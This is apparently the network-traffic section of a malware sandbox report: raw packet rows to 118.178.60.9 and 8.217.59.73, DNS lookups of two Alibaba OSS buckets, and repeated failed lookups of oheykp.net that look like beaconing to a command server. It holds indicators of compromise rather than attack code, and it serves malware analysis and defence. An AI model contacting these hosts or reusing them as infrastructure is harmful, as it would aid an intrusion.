                                                  Jan 6, 2025 04:51:41.370865107 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:41.370873928 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:41.370975971 CET49997443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:41.370981932 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:41.370992899 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:41.370999098 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:41.371097088 CET49997443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:41.371103048 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:41.371157885 CET49997443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:41.579332113 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:41.579390049 CET49997443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:41.823532104 CET49997443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:41.823544979 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:41.823555946 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:41.823563099 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:41.823632002 CET49997443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:41.823641062 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:41.823707104 CET49997443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:41.990293026 CET49997443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:42.498918056 CET49997443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:43.273112059 CET49997443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:43.273138046 CET44349997118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:43.509998083 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:43.510057926 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:43.510140896 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:43.510410070 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:43.510426998 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:44.840771914 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:44.840920925 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:44.841347933 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:44.841357946 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:44.841556072 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:44.841559887 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.234702110 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.234724045 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.234781981 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.234812975 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.234844923 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.234859943 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.234893084 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.236181974 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.236241102 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.240550041 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.240621090 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.327779055 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.327811956 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.327985048 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.327985048 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.328020096 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.328058004 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.328643084 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.328680992 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.328691959 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.328701019 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.328721046 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.328735113 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.329579115 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.329627991 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.330290079 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.330338001 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.331549883 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.331598043 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.331845045 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.331890106 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.333832026 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.333884954 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.419511080 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.419540882 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.419612885 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.419698000 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.419698954 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.419698954 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.419730902 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.419749022 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.419778109 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.419785023 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.419795036 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.419799089 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.419821024 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.419826031 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.419850111 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.419881105 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.420367956 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.420404911 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.420413971 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.420420885 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.420440912 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.420461893 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.420937061 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.420979977 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.420990944 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.421041965 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.421047926 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.421056032 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.421097040 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.421638012 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.421693087 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.421713114 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.421753883 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.422147036 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.422205925 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.424514055 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.424568892 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.425522089 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.425575972 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.425658941 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.425712109 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512434959 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512470007 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512511969 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512516022 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512547016 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512562990 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512562990 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512562990 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512587070 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512593985 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512603998 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512612104 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512631893 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512645960 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512651920 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512665033 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512682915 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512770891 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512805939 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512805939 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512814999 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512856007 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512864113 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.512912035 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.512999058 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.513050079 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.513258934 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.513307095 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.516422987 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.516479015 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.518683910 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.518733025 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.520970106 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.521039009 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.525290966 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.525348902 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.527518988 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.527582884 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.531857967 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.531914949 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.534028053 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.534095049 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.536300898 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.536355972 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.540693045 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.540765047 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.542823076 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.542872906 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.547247887 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.547323942 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.549333096 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.549491882 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.551611900 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.551664114 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.555994987 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.556046963 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.558240891 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.558296919 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.562550068 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.562607050 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.564706087 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.564771891 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.569168091 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.569222927 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.571679115 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.571731091 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.604702950 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.604751110 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.604793072 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.604796886 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.604811907 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.604830980 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.604847908 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.604847908 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.604859114 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.604888916 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.604902029 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.604937077 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.604942083 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.604953051 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.604969025 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.604983091 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.605115891 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.605155945 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.605159998 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.605168104 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.605192900 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.605279922 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.605318069 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.605398893 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.605442047 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.605504990 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.605554104 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.608642101 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.608695984 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.610797882 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.610852003 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.615139961 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.615190029 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.617387056 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.617441893 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.621707916 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.621773005 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.623991966 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.624051094 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.626148939 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.626205921 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.630470037 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.630531073 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.632828951 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.632884026 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.637123108 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.637186050 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.741074085 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.741329908 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.741821051 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.741874933 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.745971918 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.746153116 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.748162031 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.748226881 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.752552986 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.752620935 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.754543066 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.754610062 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.756709099 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.756763935 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.760759115 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.760833979 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.763190031 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.763257980 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.767081022 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.767143965 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.769150019 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.769206047 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.769216061 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.769229889 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.769267082 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.770145893 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.770167112 CET44349998118.178.60.9192.168.2.6
                                                  Jan 6, 2025 04:51:45.770179033 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:45.770220995 CET49998443192.168.2.6118.178.60.9
                                                  Jan 6, 2025 04:51:50.618134975 CET500008917192.168.2.68.217.59.73
                                                  Jan 6, 2025 04:51:50.623102903 CET8917500008.217.59.73192.168.2.6
                                                  Jan 6, 2025 04:51:50.625279903 CET500008917192.168.2.68.217.59.73
                                                  Jan 6, 2025 04:51:51.032072067 CET500008917192.168.2.68.217.59.73
                                                  Jan 6, 2025 04:51:51.037625074 CET8917500008.217.59.73192.168.2.6
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 6, 2025 04:50:35.445991993 CET6412353192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:50:35.958053112 CET53641231.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:51:13.455118895 CET6159253192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:51:13.802468061 CET53615921.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:51:49.781666040 CET6369953192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:51:49.811952114 CET53636991.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:51:55.848901033 CET5349953192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:51:55.881238937 CET53534991.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:52:01.926074028 CET5195653192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:52:01.935223103 CET53519561.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:52:08.004079103 CET6126653192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:52:08.013479948 CET53612661.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:52:14.035593033 CET5910853192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:52:14.044693947 CET53591081.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:52:20.066888094 CET5986453192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:52:20.235507965 CET53598641.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:52:26.255903006 CET5668753192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:52:26.265155077 CET53566871.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:52:32.316668034 CET4964753192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:52:32.326231956 CET53496471.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:52:38.347834110 CET5046053192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:52:38.357238054 CET53504601.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:52:44.379062891 CET5097853192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:52:44.410594940 CET53509781.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:52:50.441668034 CET5100253192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:52:50.451785088 CET53510021.1.1.1192.168.2.6
                                                  Jan 6, 2025 04:52:56.473099947 CET5602153192.168.2.61.1.1.1
                                                  Jan 6, 2025 04:52:56.482466936 CET53560211.1.1.1192.168.2.6
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jan 6, 2025 04:50:35.445991993 CET192.168.2.61.1.1.10x8188Standard query (0)hu5wd1.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:51:13.455118895 CET192.168.2.61.1.1.10x38aeStandard query (0)22mm.oss-cn-hangzhou.aliyuncs.comA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:51:49.781666040 CET192.168.2.61.1.1.10xa687Standard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:51:55.848901033 CET192.168.2.61.1.1.10xf1c9Standard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:01.926074028 CET192.168.2.61.1.1.10xc16bStandard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:08.004079103 CET192.168.2.61.1.1.10x477Standard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:14.035593033 CET192.168.2.61.1.1.10xd707Standard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:20.066888094 CET192.168.2.61.1.1.10x8d8dStandard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:26.255903006 CET192.168.2.61.1.1.10x1d6fStandard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:32.316668034 CET192.168.2.61.1.1.10x76c4Standard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:38.347834110 CET192.168.2.61.1.1.10x765Standard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:44.379062891 CET192.168.2.61.1.1.10x93a8Standard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:50.441668034 CET192.168.2.61.1.1.10x2bc5Standard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:56.473099947 CET192.168.2.61.1.1.10x490fStandard query (0)oheykp.netA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jan 6, 2025 04:50:35.958053112 CET1.1.1.1192.168.2.60x8188No error (0)hu5wd1.oss-cn-beijing.aliyuncs.comsc-231t.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 6, 2025 04:50:35.958053112 CET1.1.1.1192.168.2.60x8188No error (0)sc-231t.cn-beijing.oss-adns.aliyuncs.comsc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 6, 2025 04:50:35.958053112 CET1.1.1.1192.168.2.60x8188No error (0)sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.26A (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:51:13.802468061 CET1.1.1.1192.168.2.60x38aeNo error (0)22mm.oss-cn-hangzhou.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 6, 2025 04:51:13.802468061 CET1.1.1.1192.168.2.60x38aeNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.comsc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                                                  Jan 6, 2025 04:51:13.802468061 CET1.1.1.1192.168.2.60x38aeNo error (0)sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com118.178.60.9A (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:51:49.811952114 CET1.1.1.1192.168.2.60xa687Name error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:51:55.881238937 CET1.1.1.1192.168.2.60xf1c9Name error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:01.935223103 CET1.1.1.1192.168.2.60xc16bName error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:08.013479948 CET1.1.1.1192.168.2.60x477Name error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:14.044693947 CET1.1.1.1192.168.2.60xd707Name error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:20.235507965 CET1.1.1.1192.168.2.60x8d8dName error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:26.265155077 CET1.1.1.1192.168.2.60x1d6fName error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:32.326231956 CET1.1.1.1192.168.2.60x76c4Name error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
                                                  Jan 6, 2025 04:52:38.357238054 CET1.1.1.1192.168.2.60x765Name error (3)oheykp.netnonenoneA (IP address)IN (0x0001)false
